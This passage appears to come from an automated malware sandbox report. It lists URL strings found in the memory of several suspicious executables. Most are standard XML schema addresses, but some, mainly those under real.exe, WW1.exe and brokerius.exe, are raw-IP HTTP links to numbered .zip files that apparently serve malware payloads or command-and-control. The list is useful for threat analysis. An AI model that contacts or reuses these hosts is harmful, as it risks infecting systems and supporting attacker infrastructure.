                    Source: WW1.exe, 0000001F.00000002.745178648.00000000012FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.126:80/0659920757.ziph
                    Source: WW1.exe, 0000001F.00000002.742694757.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, WW1.exe, 0000001F.00000000.344396019.00000000001B3000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://62.204.41.126:801170NULL%s
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.419978135.00000000014A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222/
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.419978135.00000000014A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222/1571
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.419978135.00000000014A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222/15718
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.419978135.00000000014A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222/3610134416.zip
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222/3610134416.zipficateChainPolicy
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.419978135.00000000014A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222/3610134416.zips=kN
                    Source: real.exe, 00000016.00000003.334829493.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.334927709.00000000014CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222:80
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.413066984.0000000000F3D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222:80/3610134416.zip
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222:80/3610134416.zipC
                    Source: real.exe, 00000016.00000002.413066984.0000000000F3D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222:80/3610134416.ziph
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.103.222:80/3610134416.zip~
                    Source: real.exe, 00000016.00000002.415807819.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, real.exe, 00000016.00000000.310875811.0000000001264000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://77.91.103.226:80
                    Source: brokerius.exe, 0000001A.00000002.591706568.00000000003CD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://88.198.122.116:80/3478722452.zip
                    Source: brokerius.exe, 0000001A.00000002.591706568.00000000003CD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://88.198.122.116:80/3478722452.ziph
                    Source: SETUP_~1.EXE, 00000028.00000002.866354989.0000000002AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                    Source: real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.419978135.00000000014A6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.334927709.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.853630551.0000000000E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: SETUP_~1.EXE, 00000028.00000002.865725014.0000000002A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cutt.ly
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: jshainx.exe, 00000019.00000002.859740115.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/mpCore
                    Source: jshainx.exe, 00000019.00000002.859740115.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adp/1.0/f~f
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                    Source: jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultL
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
